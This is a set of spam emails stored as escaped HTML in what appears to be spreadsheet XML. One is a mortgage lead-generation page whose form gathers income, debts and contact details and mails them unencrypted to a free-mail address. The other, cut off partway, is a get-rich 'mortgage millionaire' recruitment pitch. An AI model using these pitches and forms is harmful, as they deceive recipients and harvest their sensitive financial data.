 &lt;h3 align=3D"center"&gt;&lt;font color=3D"#000000"&gt;&lt;font face=3D"Tahoma"&gt; Where =
 mortgage lenders compete for
 &lt;/font&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;font face=3D"Tahoma"&gt; your&lt;/font&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;font face=3D=
 "Tahoma"&gt;
  business!
 &lt;center&gt;&lt;h3&gt;&lt;font color=3D#0000ff&gt;Current Information For&lt;/h3&gt;&lt;/center&gt;
 &lt;SCRIPT language=3DJavaScript&gt;
 &lt;!--
 // Begin
 var months=3Dnew Array(13);
 months[1]=3D"January";
 months[2]=3D"February";
 months[3]=3D"March";
 months[4]=3D"April";
 months[5]=3D"May";
 months[6]=3D"June";
 months[7]=3D"July";
 months[8]=3D"August";
 months[9]=3D"September";
 months[10]=3D"October";
 months[11]=3D"November";
 months[12]=3D"December";
 var time=3Dnew Date();
 var lmonth=3Dmonths[time.getMonth() + 1];
 var date=3Dtime.getDate();
 var year=3Dtime.getYear();
 // Y2K Fix by Isaac Powell
 // http://onyx.idbsu.edu/~ipowell
 if ((navigator.appName =3D=3D "Microsoft Internet Explorer") &amp;&amp; (year &lt; 20=
 00))
 year=3D"19" + year;
 if (navigator.appName =3D=3D "Netscape")
 year=3D1900 + year;
 document.write("&lt;center&gt;" + lmonth + " ");
 document.write(date + ", " + year + "&lt;/center&gt;");
 // End
 // --&gt;&lt;/SCRIPT&gt;
 &lt;/font&gt;
 &lt;table border=3D"0" width=3D"750"&gt;
   &lt;tr&gt;
     &lt;td width=3D"389" height=3D"190" valign=3D"top"&gt;&lt;b&gt;&lt;font face=3D"Arial=
 " color=3D"#000000"&gt;&lt;br&gt;
       The "Lenders Network" is a 100% FREE TO BUYER Service.  Fill in our =
 &lt;a href=3D"#form"&gt;
  &lt;i&gt;&lt;font color=3D#0000ff&gt;5 Minute quote request form&lt;/font&gt;&lt;/i&gt;&lt;/a&gt; and w=
 e will instantly submit your loan request to
       our competing lenders!&lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;font face=3D"Arial" color=3D"#0=
 00000"&gt;The&lt;b&gt;
       financial experts&lt;/b&gt; comprising the "Lender's Network" represent hu=
 ndreds of loan programs, &lt;br&gt;
 including&lt;/font&gt;&lt;/p&gt;
       &lt;blockquote&gt;
         &lt;blockquote&gt;
           &lt;ul&gt;
             &lt;li&gt;&lt;b&gt; &lt;font face=3D"Arial" color=3D"#000000"&gt; purchase loans=
 &lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
             &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;refinance&lt;/font&gt;=
 &lt;/b&gt;&lt;/li&gt;
             &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;debt
               consolidation&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
             &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;home improvement=
 &amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
             &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;second mortgages=
 &lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
             &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;no income
               verification&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
           &lt;/ul&gt;
         &lt;/blockquote&gt;
       &lt;/blockquote&gt;
 		&lt;td&gt;
 			&lt;p&gt;&lt;font face=3D"Arial"&gt;Our Network of Lenders are &lt;b&gt;&lt;u&gt;Licensed and R=
 egistered&lt;/u&gt;&lt;/b&gt; to do business in all 50 U.S. States.  You will often be=
  &lt;b&gt;&lt;u&gt;contacted with an offer&lt;/u&gt;&lt;/b&gt; the very same day you fill out the =
 form!&lt;P&gt;
 &lt;u&gt;&lt;b&gt;&lt;font color=3D#0000ff&gt;NEVER SETTLE FOR A SINGLE QUOTE!&lt;/font&gt;&lt;/b&gt;&lt;/u=
 &gt;&lt;p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt; You can save &lt;i&gt;&lt;b&gt;&lt;u&gt;Thousands Of Dollars&lt;/u&gt;&lt;/b=
 &gt;&lt;/i&gt; over the course of your loan with just a 1/4 of 1% Drop in your rate=
 !  The information you provide to
 our extensive database of &lt;b&gt;Financial Experts&lt;/b&gt; will result in offer's =
 meeting the exact criterion you requested.&lt;/font&gt;&lt;br&gt;&lt;p&gt;
 &lt;font color=3D#0000ff&gt;&lt;b&gt;Get MULTIPLE OFFER'S and get the loan you want...=
 .and DESERVE!&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 		&lt;/td&gt;
       &lt;/p&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;p align=3D"center"&gt;&lt;center&gt;&lt;font face=3D"Arial" size=3D"3" color=3D"#0000=
 80"&gt;&lt;b&gt;Please
 complete this form.&lt;br&gt;
 Our loan specialist will be contacting you at your convenience.&lt;br&gt;
 Thank You.&lt;/center&gt; &lt;/b&gt;&lt;/font&gt;&lt;script language=3D"JavaScript"&gt;
 &lt;!-- 
 function validate_form() {
 validity =3D true; // assume valid
 if (!check_empty(document.form.Name.value))
 { validity =3D false; alert('Name field is empty!'); }
 if (!check_empty(document.form.HPhone.value))
 { validity =3D false; alert('Home Phone field is empty!'); }
 if (!check_empty(document.form.PropertyValue.value))
 { validity =3D false; alert('Property Value field is empty!'); }
 if (!check_empty(document.form.PurchasePrice.value))
 { validity =3D false; alert('Purchase Price field is empty!'); }
 if (!check_empty(document.form.YearAcquired.value))
 { validity =3D false; alert('Year Acquired field is empty!'); }
 if (!check_empty(document.form.Mortgage1.value))
 { validity =3D false; alert('First Mortgage Balance Field is empty!'); }
 if (!check_empty(document.form.CurrentIntRate.value))
 { validity =3D false; alert('First Mortgage Interest Rate field is empty!'=
 ); }
 if (!check_empty(document.form.BorrowRequest.value))
 { validity =3D false; alert('Amount You Wish To Borrow field is empty!'); =
 }
 if (!check_empty(document.form.MonthlyGrIncome.value))
 { validity =3D false; alert('Gross Monthly Income field is empty!'); }
 (validity)
 alert ("Thank you for your registration! "
 + "Your form is now being passed to your browser's "
 + "Mail Delivery Sub-System for NORMAL"
 + " NON-ENCRYPTED email delivery."
 + " All email addresses are removed from our system"
 + " upon registration. Please click OK to proceed");
 return validity;
 }
 function check_empty(text) {
 return (text.length &gt; 0); // returns false if empty
 }
 // --&gt;
 &lt;/script&gt;
 &lt;/p&gt;
 &lt;form name=3D"form" onsubmit=3D"return validate_form()" 
 action=3D"mailto:reffon887@uole.com?SUBJECT=3DMortgage Contact 2" method=3D=
 "POST" encType=3D"text/plain"&gt;
   &lt;center&gt;
   &lt;table cellSpacing=3D"0" cellPadding=3D"0" width=3D"552" bgColor=3D"#993=
 366" border=3D"0"&gt;
     &lt;caption&gt;&amp;nbsp;&lt;/caption&gt;
     &lt;tbody&gt;
     &lt;/tbody&gt;
   &lt;/center&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td noWrap align=3D"left" width=3D"536" bgColor=3D"#000080" colSpan=3D=
 "2"&gt;&lt;center&gt;&lt;b&gt;&lt;font size=3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Contact
         Information: * Required Info&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Name:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input maxLengt=
 h=3D"60" size=3D"29" name=3D"Name"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Address:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input maxLengt=
 h=3D"50" size=3D"29" name=3D"Address"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td=
 &gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;City:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input id=3D"Ci=
 ty" maxLength=3D"30" size=3D"29" name=3D"City"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/=
 font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;State
         (USA Only):&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;select id=3D"S=
 tate" size=3D"1" name=3D"State"&gt;
           &lt;option value=3D"AK" selected&gt;AK&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"AR"&gt;AR&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"AZ"&gt;AZ&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"CA"&gt;CA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"CO"&gt;CO&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"CT"&gt;CT&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"DC"&gt;DC&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"DE"&gt;DE&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"FL"&gt;FL&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"GA"&gt;GA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"HI"&gt;HI&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"IA"&gt;IA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"ID"&gt;ID&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"IL"&gt;IL&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"IN"&gt;IN&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"KS"&gt;KS&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"KY"&gt;KY&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"LA"&gt;LA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MA"&gt;MA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MD"&gt;MD&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"ME"&gt;ME&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MI"&gt;MI&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MN"&gt;MN&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MO"&gt;MO&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MS"&gt;MS&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"MT"&gt;MT&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NC"&gt;NC&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"ND"&gt;ND&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NE"&gt;NE&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NH"&gt;NH&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NJ"&gt;NJ&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NM"&gt;NM&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NV"&gt;NV&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"NY"&gt;NY&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"OH"&gt;OH&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"OK"&gt;OK&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"OR"&gt;OR&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"PA"&gt;PA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"RI"&gt;RI&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"SC"&gt;SC&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"SD"&gt;SD&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"TN"&gt;TN&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"TX"&gt;TX&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"UT"&gt;UT&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"VA"&gt;VA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"VT"&gt;VT&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"WA"&gt;WA&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"WI"&gt;WI&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"WV"&gt;WV&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"WY"&gt;WY&amp;nbsp;&lt;/option&gt;
           &amp;nbsp;
         &lt;/select&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Zip/Postal
         Code:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input maxLengt=
 h=3D"10" size=3D"14" name=3D"PostalCode"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;=
 /td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Home
         Phone:&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input maxLengt=
 h=3D"12" size=3D"14" name=3D"HPhone"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Work
         Phone:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input maxLengt=
 h=3D"12" size=3D"14" name=3D"WPhone"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Email
         Address:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;input maxLengt=
 h=3D"100" size=3D"14" name=3D"Email"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr align=3D"middle"&gt;
       &lt;td align=3D"right" width=3D"208" bgColor=3D"#000080"&gt;&lt;font size=3D"=
 +0" color=3D"#ffffff" face=3D"Arial"&gt;Best
         Time to Call:&lt;/font&gt;&lt;/td&gt;
       &lt;td align=3D"left" width=3D"328" bgColor=3D"#000080"&gt;&lt;select size=3D=
 "1" name=3D"CallTime"&gt;
           &lt;option value=3D"Morning at Home" selected&gt;Morning at Home&lt;/opti=
 on&gt;
           &amp;nbsp;
           &lt;option value=3D"Morning at Work"&gt;Morning at Work&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"Afternoon at Home"&gt;Afternoon at Home&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"Afternoon at Work"&gt;Afternoon at Work&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"Evening at Home"&gt;Evening at Home&lt;/option&gt;
           &amp;nbsp;
           &lt;option value=3D"Late Evening at Work"&gt;Late Evening at Home&lt;/opt=
 ion&gt;
           &amp;nbsp;
         &lt;/select&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
   &lt;/table&gt;
   &lt;div align=3D"center"&gt;
     &lt;center&gt;
     &lt;table cellSpacing=3D"0" cellPadding=3D"0" width=3D"550" bgColor=3D"#0=
 00099" border=3D"0"&gt;
       &lt;tbody&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Do
             You Own Your Home?:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;select size=3D"1" name=3D=
 "Homeowner"&gt;
               &lt;option value=3D"Yes" selected&gt;Yes&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"No"&gt;No&lt;/option&gt;
               &amp;nbsp;
             &lt;/select&gt;&lt;b&gt;&lt;font size=3D"-1" color=3D"#ffffff" face=3D"Arial"=
 &gt;Mobile
             Homes DO NOT Qualify&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Property
             Value:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"PropertyValue"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Property
             Type:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;select size=3D"1" name=3D=
 "PropertyType"&gt;
               &lt;option value=3D"Single Family Residence" selected&gt;Single Fa=
 mily
               Residence&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Condo"&gt;Condo&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Townhouse"&gt;Townhouse&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"2-4 Plex"&gt;2-4 Plex&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Other"&gt;Other&lt;/option&gt;
               &amp;nbsp;
             &lt;/select&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Purchase
             Price:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"PurchasePrice"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Year
             Acquired:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"YearAcquired"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;1st
             Mortgage Balance Owed:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"Mortgage1"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;1st
             Mortgage Interest Rate:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"CurrentIntRate"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Is
             1st Adjustable or Fixed?:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;select size=3D"1" name=3D=
 "FirstType"&gt;
               &lt;option value=3D"Fixed" selected&gt;Fixed&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Adjustable"&gt;Adjustable&lt;/option&gt;
               &amp;nbsp;
             &lt;/select&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;2nd
             Mortgage Balance Owed:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"Mortgage2"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Amount
             You Wish To Borrow:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"BorrowRequest"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Employer:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"Employer"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Monthly
             Gross Household Income:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" s=
 ize=3D"14" name=3D"MonthlyGrIncome"&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td bgColor=3D"#000080"&gt;
             &lt;div align=3D"right"&gt;
               &lt;font size=3D"+0" face=3D"Arial"&gt;&lt;font color=3D"#ffffff"&gt;Mon=
 thly Debt:&lt;/font&gt;&lt;font color=3D"#0000ff"&gt;:&lt;/font&gt;&lt;/font&gt;&amp;nbsp;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td bgColor=3D"#000080"&gt;&lt;input maxLength=3D"100" size=3D"14" nam=
 e=3D"MonthlyDebt"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td noWrap align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;fo=
 nt size=3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Credit
             Rating:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;select size=3D"1" name=3D=
 "CreditRating"&gt;
               &lt;option value=3D"Please Select" selected&gt;Please Select&lt;/opti=
 on&gt;
               &lt;option value=3D"Good"&gt;Good&lt;/option&gt;
               &amp;nbsp;&amp;nbsp;
               &lt;option value=3D"Fair"&gt;Fair&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Poor"&gt;Poor&lt;/option&gt;
               &lt;option value=3D"Excellent"&gt;Excellent&lt;/option&gt;
               &amp;nbsp;
             &lt;/select&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"right" width=3D"212" bgColor=3D"#000080"&gt;&lt;font size=
 =3D"+0" color=3D"#ffffff" face=3D"Arial"&gt;Loan
             Interested In:&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"334" bgColor=3D"#000080"&gt;&lt;select size=3D"1" name=3D=
 "LoanInterested"&gt;
               &lt;option value=3D"Consolidation" selected&gt;Debt Consolidation&lt;=
 /option&gt;
               &amp;nbsp;
               &lt;option value=3D"Second"&gt;Second Mortgage&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Improvement"&gt;Home Improvement&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Refinance"&gt;Refinance&lt;/option&gt;
               &amp;nbsp;
               &lt;option value=3D"Refinance"&gt;Purchase&lt;/option&gt;
               &amp;nbsp;
             &lt;/select&gt;&lt;font color=3D"#ffffff"&gt;*&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/tbody&gt;
     &lt;/table&gt;
     &lt;/center&gt;
   &lt;/div&gt;
   &lt;center&gt;&lt;input type=3D"submit" value=3D"Submit Form" name=3D"Submit"&gt;&lt;in=
 put type=3D"reset" value=3D"Clear Form"&gt;
   &lt;/form&gt;
 &lt;/center&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;
 &lt;hr width=3D"80%" size=3D"1" color=3D"#FF0000"&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"2"&gt;&lt;font color=3D"#000080=
 "&gt;&lt;b&gt;Removal
 Instructions&lt;br&gt;
 &lt;/b&gt;Click on the below link to be excluded from further communication.&lt;/fo=
 nt&gt;
 &lt;br&gt;&lt;b&gt;&lt;a href=3D"mailto:reffon887@uole.com?subject=3Dremove"&gt;Click Here&lt;/=
 a&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: **** American Millionaire Reveals His Secret Source of Wealth On The Internet!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;FONT COLOR ="#000000"&gt; &lt;STRONG&gt;&lt;H3&gt;Hello! : &lt;/H3&gt;&lt;/FONT&gt;
 &lt;p&gt;
 ===================================================================
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H1&gt; "Dmm": Discount Mortgage Millionaire&lt;BR&gt; 
 Program: &lt;BR&gt;&lt;/H1&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#008000"&gt;&lt;H1&gt;A Special Invitation To Wealth !!! &lt;/FONT&gt;&lt;/H1&gt;
 &lt;P&gt;	
 &lt;FONT COLOR ="#0000FF"&gt;&lt;H2&gt;&lt;FONT TYPE="ARIEL"&gt;&lt;STRONG&gt;Help Us Contact Home Owners In Your City And Pocket &lt;BR&gt;
 "$1000" / Deal, Easy Cash!!! &lt;/FONT&gt;&lt;/H2&gt;&lt;/STRONG&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt;
 =============================================================
 &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; To:
 &lt;P&gt;
 This e-mail is addressed to  all people who have tried different internet &lt;BR&gt;
 programs and failed,  who are tired of working hard, but getting nowhere, &lt;BR&gt;
 who are unemployed,  and all those who have jobs but need extra income, &lt;BR&gt;
 and all those who are sick and tired of being sick and tired. &lt;/H5&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="FF0000"&gt;&lt;H2&gt; How It Works: &lt;/H2&gt;&lt;/FONT&gt;
 &lt;p&gt;
 &lt;FONT COLOR ="#000000"&gt;&lt;H5&gt; We buy Real Estate Notes and Trust Deeds. We also represent investors &lt;BR&gt;
 who invest in them.
 &lt;P&gt;
 When you apply, you can help us contact Home Owners in your city and &lt;BR&gt;
 on the internet.
 &lt;p&gt;
 All you do is call or e-mail them or send a simple but Powerful letter and form &lt;BR&gt;to them to complete and return back to us.
 &lt;p&gt;
 If they have Real Estate Notes or Trust Deeds, we'll either buy them or refer&lt;BR&gt; 
 them to our associates. 
 &lt;p&gt;
 If the deal goes through, we pay you 10% of whatever net amount we made. &lt;/H5&gt;&lt;/FONT&gt;
